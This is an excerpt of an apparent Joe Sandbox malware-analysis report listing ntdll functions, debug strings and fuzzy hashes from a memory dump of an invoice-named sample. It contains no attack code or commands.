                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/P2$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                  • API String ID: 0-3973197215
                                  • Opcode ID: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                  • Instruction ID: a89f89e457ec6d0c710f830b18ac6a0642751ec3b9192aa2f93a68e55da0f0bd
                                  • Opcode Fuzzy Hash: a3423cb2fe357cfd1020e9159d08f4e190ab8795fc6d952140ee01a107596a16
                                  • Instruction Fuzzy Hash: E3A15D76908345DFE711CF21C490B9BB7E8BF88755F40492EEA8896281DB74DA48CF93
                                  Function 324F1070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                  • API String ID: 3446177414-3570731704
                                  • Opcode ID: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                  • Instruction ID: 99427c71fda525d0ec04198dbf8e5205cd18d1848af9f9b432b1c6a5dfdd3562
                                  • Opcode Fuzzy Hash: 90b65f27b55a79fb0070d61dc83e4ee772e73500ade119b43575e85a54856677
                                  • Instruction Fuzzy Hash: 81924475A01368DFEB24CF28C840B99B7B5AF85754F1181EAE84DAB380DB719E81CF51
                                  Function 3250D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 3250D959
                                    • Part of subcall function 324E4859: RtlDebugPrintTimes.NTDLL ref: 324E48F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1975516107
                                  • Opcode ID: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                  • Instruction ID: 1662c5b5b2b54eb9dd7b8ed36f88cc948dfab0bbe4a6af34d68d671336e024e7
                                  • Opcode Fuzzy Hash: 9bedff8923e6c613421f550f932999aacc6c1bf346e98ba25013de1633a1a646
                                  • Instruction Fuzzy Hash: EC51BC75E063459BEB04CFA4CC8479DBBB1FF44728F548559D801AB281DBB1AA82CF90
                                  Function 3250DB00 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                  • API String ID: 3446177414-3224558752
                                  • Opcode ID: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                  • Instruction ID: 3fa13cb8eab8c6c6f1c2aeab3fca085173bfef38aa1f0f8d08414e05c33e5e48
                                  • Opcode Fuzzy Hash: 9f13f75ab39185b0e1e687edb8d099eb51208ab7124ab8582f4c7eb8373d7b06
                                  • Instruction Fuzzy Hash: 66413575A01740DFE701CF28C994B6AFBB4EF40368F1085A9E8419B791CF78AA80CF91
                                  Function 32579179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                  • API String ID: 0-3063724069
                                  • Opcode ID: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                  • Instruction ID: d69845fa119f07e25be7db1021fdfc5a6b3db40c0a7e8b4aef0ff809c81d758a
                                  • Opcode Fuzzy Hash: 410458f28e15229e07cf0a86ca518b64d52324f3e3d509157c6c9a28a04f4ed1
                                  • Instruction Fuzzy Hash: EFD1C7B2845395AFD721CB58C940B9BBBE8AFC4754F814A2DF98497150E770CF488BA2
                                  Function 324DF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-523794902
                                  • Opcode ID: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                  • Instruction ID: 8627010d87469f59aa042ba9b06964094997bca4a927bbefb9bfecf39d4c71fc
                                  • Opcode Fuzzy Hash: f650944bb8f5f77d472878e7f4782c01ede360d0b5cccb7abe4e394ce6cee5fa
                                  • Instruction Fuzzy Hash: 1B42E0756053819FD715CF24C8A0B1ABBE5FF84348F05596DE885CB352DB34EA82CB92
                                  Function 325051EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: H/P2$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                  • API String ID: 0-2399442170
                                  • Opcode ID: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                  • Instruction ID: 6cdd88b4827bb418b004110b97b876870fed42ddc238f0a87d0ebeac7039e49e
                                  • Opcode Fuzzy Hash: be6f5611b613d382230515babc261974f51fb94b40c750ee6e24a64206d94cce
                                  • Instruction Fuzzy Hash: 05F13AB6D11219EFDB15CFA8C980ADEBBB9FF48750F51446AE501A7250EA709F01CFA0
                                  Function 324FB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                  • API String ID: 0-122214566
                                  • Opcode ID: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                  • Instruction ID: fb95ef0c225b60b6efa78ae9f4116da510c99bfbe8a7488b5b0dbc6d83161456
                                  • Opcode Fuzzy Hash: ef5006f69bc9d573c079851fbabb38c14e92217ecaebe80b0506d9c52a5dc07d
                                  • Instruction Fuzzy Hash: B3C13A71A00315BBEB148F64CC84B7EBBA5AFCA308F558069EC45AB390DFB5CA45C391
                                  Function 324F0770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-4253913091
                                  • Opcode ID: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                  • Instruction ID: 342ff69bd6ceb92e8e65b2278c546c7889bb33dfa45d7aa9b313bed36a86e272
                                  • Opcode Fuzzy Hash: 904821a76b72c8d5bd2aaeb063595d51f6e4278889a1d67daace0f897da45a0f
                                  • Instruction Fuzzy Hash: 72F1AE74A00605EFEB19CF68C890F6AB7F5FF94344F1091A9E8459B395DB31EA81CB90
                                  Function 3250F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325502BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325502E7
                                  • RTL: Re-Waiting, xrefs: 3255031E
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                  • Instruction ID: d18105a63272b40c66d287ef8f58f59d3a60c7a80c800b5ae8ec050fa613a1de
                                  • Opcode Fuzzy Hash: cde5d8eb6c8671af8e46602eabd1cccd3ee1f5601b0617fed429fb452d31ce94
                                  • Instruction Fuzzy Hash: D0E1C0756087419FE715CF28C880B1ABBE0BF88364F604A5EF495CB2E1DB74EA45CB42
                                  Function 325BB16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                  • Instruction ID: 38505dd6ce1b7d8332c85a8066426ee1f6aa3d17c5de81d54067afd6e816bbfb
                                  • Opcode Fuzzy Hash: 579532dda226d5a5f49b11eda65bccf5517074c86628e2246aa6620ec84f758c
                                  • Instruction Fuzzy Hash: EDF10676E006118BDF08CF69C99167EFFF6AF98200B59416DD856DB380EAB4EA41CB50
                                  Function 325911A4 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: This is located in the %s field of the heap header.$ -M2`$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                  • API String ID: 0-1754937585
                                  • Opcode ID: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                  • Instruction ID: 803f873d586b35b0e4d3bb37ee5fcd810fc8a8d731fb6d0a11ea17a986effce5
                                  • Opcode Fuzzy Hash: 97f08afef848e457dbc45efe5c7a1e3e46310ba46ed28f259aae480ebee63909
                                  • Instruction Fuzzy Hash: 2031F435101260EFEB05EB99C880F9677E8FF04B65F508499F842DB291DB70EE40DEA5
                                  Function 324D76B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                  • API String ID: 0-3061284088
                                  • Opcode ID: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                  • Instruction ID: 77d74229d5c8ed434f149dda5479f8657fcf735338769bc8fcee7dcf8c2b7104
                                  • Opcode Fuzzy Hash: 707d0e88265372a5d9522fb521a0d63444965c612d4b7e93d14c870bebad4bf2
                                  • Instruction Fuzzy Hash: 9701F7374066C0DEE61A9728D529F62BBE4EF42B31F2440DDF5448BA52CEB4A981CA70
                                  Function 324F70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                  • API String ID: 0-3178619729
                                  • Opcode ID: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                  • Instruction ID: 5d53639b9f6d2326666e77174a7ca9befacf66680302a17007f8eda785e0c3bc
                                  • Opcode Fuzzy Hash: 76bbda33ae143197a2b00f04051855ff8dda6cec247bbd2fb4bb3f74dcb2a354
                                  • Instruction Fuzzy Hash: E213BF74A00755AFEB15CF68C9807A9BBF1FF88304F148159D845AF381DB76A992CF90
                                  Function 324EB6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UK2
                                  • API String ID: 0-235712404
                                  • Opcode ID: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                  • Instruction ID: 613eef19373aacf2e258b32dbc1f41697f452c83cc8102a9643d26a788751171
                                  • Opcode Fuzzy Hash: 5cae747d93c19462a1e14aedbb28db55c961295d8557d9b3df59978da163ff27
                                  • Instruction Fuzzy Hash: 51B1DF76A06744AFEB15CF65C880B9DF7B5BF54368F644529E852EB7A0DB30EA40CB00
                                  Function 324EB440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UK2${
                                  • API String ID: 0-1304081954
                                  • Opcode ID: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                  • Instruction ID: 6d8d332f88385d1e556483e347fb327fdc006b6ecc986d8a298f04881de327b0
                                  • Opcode Fuzzy Hash: 3f9a65203a88131f97b4738b07c075534fed209f695499ff898d79006140ae28
                                  • Instruction Fuzzy Hash: 6A91F3B5902309DFFB15CF64C940B9DB7B0FF10769F604195E852AB3A0DB789A81CB91
                                  Function 324DF626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                  • API String ID: 0-2586055223
                                  • Opcode ID: 47927b866ba19bb8f75bbc5a95ddc3870583236c681a59f6962d7877f1b3b748
                                  • Instruction ID: ec6c01214aa2de834866cd5101da27e41693be20015727f95a3767a5e92ba7f6
                                  • Opcode Fuzzy Hash: 47927b866ba19bb8f75bbc5a95ddc3870583236c681a59f6962d7877f1b3b748
                                  • Instruction Fuzzy Hash: 7F613776245780AFE312CF24C864F5B7BE8FF84B54F050458FA548B292DB74DA42CBA1
                                  Function 324D9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                  • API String ID: 0-1391187441
                                  • Opcode ID: 01054357650b9372566e2e51b640e0de95718b73c13d4591c6ccf514238576f1
                                  • Instruction ID: 6d417f8f9685f179181569e0b052ce647ebea92dc917efa3cb04f1bd9f62a238
                                  • Opcode Fuzzy Hash: 01054357650b9372566e2e51b640e0de95718b73c13d4591c6ccf514238576f1
                                  • Instruction Fuzzy Hash: F731C136A01654EFEB02CB49CC94F9EB7B8EF45764F144095E914EB292DB70EE40CA60
                                  Function 32521270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$BuildLabEx$EQ2$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                  • API String ID: 0-22242143
                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                  • Instruction ID: 465b639d055e42e5a969a19c44ee3131c38859e74db0bbe7dd4fe89a725e8632
                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                  • Instruction Fuzzy Hash: CE318D76900318BFDB119FA5CD40EDFBBB9EB84B54F508425E914A71E0EB70DB058BA0
                                  Function 324E7152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: 3ca11a42066165e10bd6eb77fa90ea7b9ef1ced62f90505a029b4bd2f9667fb8
                                  • Instruction ID: f1a55a46eb31524e1bd6ea3ce36fd352325b9156d7249ab76e965a074ff1f416
                                  • Opcode Fuzzy Hash: 3ca11a42066165e10bd6eb77fa90ea7b9ef1ced62f90505a029b4bd2f9667fb8
                                  • Instruction Fuzzy Hash: 8451B035A00705ABFB0ACF64CA44B6DFBB4BF44766F108169E91297390DFB49A41CB80
                                  Function 32573A78 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                  • API String ID: 0-1168191160
